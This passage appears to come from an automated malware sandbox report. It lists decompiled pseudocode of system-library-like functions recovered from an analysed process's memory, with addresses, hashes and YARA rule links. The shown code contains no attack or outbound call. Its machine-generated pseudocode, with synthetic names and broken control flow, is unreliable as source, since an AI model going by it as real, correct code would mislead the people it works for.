					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                        0x02b8fe96
                        0x02b8fe9e
                        0x02b8fea1
                        0x02b8fead
                        0x02b8feb3
                        0x02b8feb9
                        0x02b8fec3
                        0x02b8fed5
                        0x02b8fec5
                        0x02b8fece
                        0x02b8fece
                        0x02b8fee0
                        0x02b8fee1
                        0x02b8fee3
                        0x02b8fee8
                        0x02b8fefb

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6b345fd2220bd3763a19af09abd5b2295a1e5fd0f19fb613fd9aa37081b1417e
                        • Instruction ID: b6bb6a355883fcc24185713cff3dd0316deaef441ebca1c4247000de511c65d1
                        • Opcode Fuzzy Hash: 6b345fd2220bd3763a19af09abd5b2295a1e5fd0f19fb613fd9aa37081b1417e
                        • Instruction Fuzzy Hash: 2C011271A0060DEFCB14EFA8D545A6EB7F4EF04304F544599E519DB382DA75D901CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB131B, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E02BB131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2bed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E02B17D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x02bb131b
                        0x02bb132a
                        0x02bb1330
                        0x02bb1336
                        0x02bb133e
                        0x02bb1341
                        0x02bb1344
                        0x02bb134f
                        0x02bb1361
                        0x02bb1351
                        0x02bb135a
                        0x02bb135a
                        0x02bb136c
                        0x02bb136d
                        0x02bb136f
                        0x02bb1374
                        0x02bb1387

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d96333928a165a129c422baaa81988b6d959c2747df860eb6e145fbb28fc2192
                        • Instruction ID: dead405be35b54c285eee8d6aeac0e8dc0225f90e59ce6101c096b36ae3eef0a
                        • Opcode Fuzzy Hash: d96333928a165a129c422baaa81988b6d959c2747df860eb6e145fbb28fc2192
                        • Instruction Fuzzy Hash: CD011971A05608AFCB04EFA9D545AAEB7F4EF08700F408099F815EB381EA74DA00CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8F6A, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E02BC8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2bed360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E02B17D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x02bc8f6a
                        0x02bc8f79
                        0x02bc8f81
                        0x02bc8f84
                        0x02bc8f8b
                        0x02bc8f91
                        0x02bc8f94
                        0x02bc8f9e
                        0x02bc8fb0
                        0x02bc8fa0
                        0x02bc8fa9
                        0x02bc8fa9
                        0x02bc8fbb
                        0x02bc8fbc
                        0x02bc8fbe
                        0x02bc8fc3
                        0x02bc8fd6

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f0ded7dd5ccd2921d5ae135e82ef3862d106231cab54b2e387cef07ec012c3c
                        • Instruction ID: d3ec258a648c88a6c5f1462ce75760d7570d41ac008bd3645c55e2ed251de501
                        • Opcode Fuzzy Hash: 9f0ded7dd5ccd2921d5ae135e82ef3862d106231cab54b2e387cef07ec012c3c
                        • Instruction Fuzzy Hash: 66013C74A0060CAFCB05EFA8D545AAEB7B5EF18300F508499F915EB391EA74DA00DB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB1608, Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E02BB1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x2bed360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E02B17D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                        0x02bb1608
                        0x02bb1617
                        0x02bb161d
                        0x02bb1625
                        0x02bb1628
                        0x02bb162b
                        0x02bb1636
                        0x02bb1648
                        0x02bb1638
                        0x02bb1641
                        0x02bb1641
                        0x02bb1653
                        0x02bb1654
                        0x02bb1656
                        0x02bb165b
                        0x02bb166e

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec0c49ccbc30ddae079f8cedb02e3033c4ee9264d6420c4d0a93526b052587f5
                        • Instruction ID: e7dbad4e20f827211ee452dc688dffdb32189642b4e54e05f6033befe1a1fc8c
                        • Opcode Fuzzy Hash: ec0c49ccbc30ddae079f8cedb02e3033c4ee9264d6420c4d0a93526b052587f5
                        • Instruction Fuzzy Hash: 65F06D71E10648EFDB05EFA8D405AAEB7F8EF08300F4440A9E915EB381EA749900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1C577, Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B1C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02B1C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2ad11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E02BC88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                        0x02b1c577
                        0x02b1c57d
                        0x02b1c581
                        0x02b1c5b5
                        0x02b1c5b9
                        0x02b1c5ce
                        0x02b1c5ce
                        0x02b1c5ca
                        0x00000000
                        0x02b1c5ca
                        0x02b1c5c4
                        0x02b1c5c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b1c5ad
                        0x00000000
                        0x02b1c5af

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 406392f45f11c1100dc4aa563378d0eae00bcac9dc01fcba1450eddb58e937c8
                        • Instruction ID: 802a82918bbbc105274a652802463b424be150cab6f3cbeb9aa29e2590839a79
                        • Opcode Fuzzy Hash: 406392f45f11c1100dc4aa563378d0eae00bcac9dc01fcba1450eddb58e937c8
                        • Instruction Fuzzy Hash: 29F0E2B29956909FD732C728C006B22BFEADB05778FD484EBE40A87643C7A4D880C757
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B3927A, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E02B3927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E02B3FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E02B392C6(_t11, _t14);
				}
				return _t11;
			}





                        0x02b39295
                        0x02b39299
                        0x02b3929f
                        0x02b392aa
                        0x02b392ad
                        0x02b392ae
                        0x02b392af
                        0x02b392b0
                        0x02b392b4
                        0x02b392bb
                        0x02b392bb
                        0x02b392c5

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: a379f0163b5518300cbd028abbddfae6e32f9350a1f8036917cdfe5e347227e2
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: E5E09B723409406BD7129E55DC84F57776EEF82725F0440B9F5045E252C6F5DD098BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB2073, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E02BB2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E02BAFD22(__ecx);
				_t19 =  *0x2be849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x2be8748; // 0x0
					if(__eflags <= 0) {
						E02BB1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x2be8724 & 0x00000004;
							if(( *0x2be8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x2be8724; // 0x0
					return E02BA8DF1(__ebx, 0xc0000374, 0x2be5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                        0x02bb2076
                        0x02bb2078
                        0x02bb207d
                        0x02bb2083
                        0x02bb20a4
                        0x02bb20aa
                        0x02bb20ac
                        0x02bb20b7
                        0x02bb20ba
                        0x02bb20bc
                        0x02bb20c9
                        0x02bb20c9
                        0x02bb20d0
                        0x02bb20d2
                        0x00000000
                        0x02bb20d2
                        0x02bb20be
                        0x02bb20c3
                        0x02bb20c5
                        0x02bb20c7
                        0x00000000
                        0x00000000
                        0x02bb20c7
                        0x02bb20bc
                        0x02bb20d4
                        0x02bb2085
                        0x02bb2085
                        0x02bb20a3
                        0x02bb20a3

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dd955b8a68a7c03d6652be537359bc334419bab584b4363ecf9bf20353c1c05
                        • Instruction ID: 457495f6fa8537bf0ddc956e5b9903b8aa8968d856ee1d1d150d119d78893590
                        • Opcode Fuzzy Hash: 2dd955b8a68a7c03d6652be537359bc334419bab584b4363ecf9bf20353c1c05
                        • Instruction Fuzzy Hash: 74F0E57B825585CADF336B2871123F23B95DF45294F8D18C6DC945F208C6B58893CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8D34, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E02BC8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x2bed360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E02B17D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                        0x02bc8d34
                        0x02bc8d43
                        0x02bc8d4b
                        0x02bc8d4e
                        0x02bc8d52
                        0x02bc8d5c
                        0x02bc8d6e
                        0x02bc8d5e
                        0x02bc8d67
                        0x02bc8d67
                        0x02bc8d79
                        0x02bc8d7a
                        0x02bc8d7c
                        0x02bc8d81
                        0x02bc8d94

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b64b223c95781e6cf8e4ac0034f954eeb91b9f9a980c5b2a9b1e2e78f07aef0
                        • Instruction ID: 4b29d10823d315600eb778b8278378ded037e272fba73a8e36487a0c87b2d80d
                        • Opcode Fuzzy Hash: 7b64b223c95781e6cf8e4ac0034f954eeb91b9f9a980c5b2a9b1e2e78f07aef0
                        • Instruction Fuzzy Hash: 8CF0BE70E44A0CAFCB04EFB8D441A6EB7B8EF08300F5084D9E915EB281EA34D900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8B58, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E02BC8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2bed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E02B17D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x02bc8b67
                        0x02bc8b6f
                        0x02bc8b72
                        0x02bc8b7d
                        0x02bc8b8f
                        0x02bc8b7f
                        0x02bc8b88
                        0x02bc8b88
                        0x02bc8b9a
                        0x02bc8b9b
                        0x02bc8b9d
                        0x02bc8ba2
                        0x02bc8bb5

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cf19297dc09b1dd64e77d37603f40fde6e8e167e20b1c71094a66df649dbf62
                        • Instruction ID: e4fb139330b7f0c6b7b81f46bee65340496b5296a76a217727d98bd4dde4402a
                        • Opcode Fuzzy Hash: 1cf19297dc09b1dd64e77d37603f40fde6e8e167e20b1c71094a66df649dbf62
                        • Instruction Fuzzy Hash: 21F082B0A44658ABDB05EBA8D906E6EB3B8EF04304F540499F915DB3C1EB74D900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF4F2E, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02AF4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E02BC88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E02B1C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2ad1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                        0x02af4f2e
                        0x02af4f34
                        0x02af4f38
                        0x02b50b85
                        0x02b50b85
                        0x02b50b89
                        0x02b50b9a
                        0x02b50b9a
                        0x02b50b9f
                        0x00000000
                        0x02b50b9f
                        0x02b50b94
                        0x02b50b98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b50b98
                        0x02af4f3e
                        0x02af4f48
                        0x00000000
                        0x02af4f6e
                        0x00000000
                        0x02af4f70

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b58accea1597694cda8cc790d3eb9211838fb7cacc0d8cd139fcc7e3fb1f6d2
                        • Instruction ID: dbbbb2171a4f09634507bbee54d32ecfa46e9801616312f73325229d4ef61fa3
                        • Opcode Fuzzy Hash: 7b58accea1597694cda8cc790d3eb9211838fb7cacc0d8cd139fcc7e3fb1f6d2
                        • Instruction Fuzzy Hash: AAF0E232929AA48FD7B1E758C1D0B22B7E4EF0C7B8F454CE5D8058B921EB24ED40CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8CD6, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E02BC8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2bed360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E02B17D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x02bc8ce5
                        0x02bc8ced
                        0x02bc8cf0
                        0x02bc8cfb
                        0x02bc8d0d
                        0x02bc8cfd
                        0x02bc8d06
                        0x02bc8d06
                        0x02bc8d18
                        0x02bc8d19
                        0x02bc8d1b
                        0x02bc8d20
                        0x02bc8d33

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e6625327def36e2292b8dd90b16bbc25c318907f0afe7df810b29e93459d292
                        • Instruction ID: 5648c88fd6ebc686e89ee80e9cbe8a4ac85f0e4f62539dbd75bba94feaeb19da
                        • Opcode Fuzzy Hash: 0e6625327def36e2292b8dd90b16bbc25c318907f0afe7df810b29e93459d292
                        • Instruction Fuzzy Hash: 08F08270A0460CABCB05DFA8D945E6EB7B8EF09304F6001DDE916EB2C1EA34D900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1746D, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E02B1746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E02B0EB70(__ecx, 0x2be79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E02B395D0();
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                        0x02b1746d
                        0x02b1746d
                        0x02b1746d
                        0x02b17471
                        0x02b17488
                        0x02b5f92d
                        0x02b1748e
                        0x02b17491
                        0x02b17495
                        0x02b5f937
                        0x02b5f93a
                        0x02b5f94e
                        0x02b5f953
                        0x02b5f956
                        0x02b5f956
                        0x02b17495
                        0x00000000
                        0x02b17488
                        0x02b17473
                        0x02b17478
                        0x02b1747d
                        0x02b17481
                        0x00000000
                        0x02b17481
                        0x02b1747d
                        0x02b1747a
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e3d5b615993ffd9685366caaef177c6328db9a67159e786d8d62af4bcd9f1a4
                        • Instruction ID: 0081df9a6c420016fb03416ef232aba6379a16e323f3ae1613f49e03db44847e
                        • Opcode Fuzzy Hash: 2e3d5b615993ffd9685366caaef177c6328db9a67159e786d8d62af4bcd9f1a4
                        • Instruction Fuzzy Hash: E6F0E935D00544ABDF0297A8C442B79FFB2EF04314F8805D5D951AB160EF64D800DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2A44B, Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B2A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x2be7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E02B3FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                        0x02b2a44b
                        0x02b2a453
                        0x02b2a472
                        0x02b2a476
                        0x00000000
                        0x02b2a493
                        0x02b2a47a
                        0x02b2a47f
                        0x02b2a486
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faf889e8783767545cfd5f0c834ba566c336d46624e99467d015b3aa1a481b64
                        • Instruction ID: 0ad0784a9dc62eef855511f1e4aabaa4dbad9aff9b851e621de1b4022b1ce4e2
                        • Opcode Fuzzy Hash: faf889e8783767545cfd5f0c834ba566c336d46624e99467d015b3aa1a481b64
                        • Instruction Fuzzy Hash: B9E09272A41421ABD2125A58AC40F66B3AEDBD4755F0944B5E908C7220DA28DD15C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFF358, Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E02AFF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E02B2F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L02B14620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                        0x02aff35d
                        0x02aff361
                        0x02aff367
                        0x02aff372
                        0x02aff38c
                        0x02aff38c
                        0x02aff394

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: f022d6e44bc89e91d704c8b642260ba849e5218df0b1e3370a88fb1adca33dfa
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: EEE0D833A40118BFCB6196D99E05F6ABBBDDB44B60F0041D5BA04D7590D9789D00C6D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0FF60, Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B0FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2ad11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E02BC88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
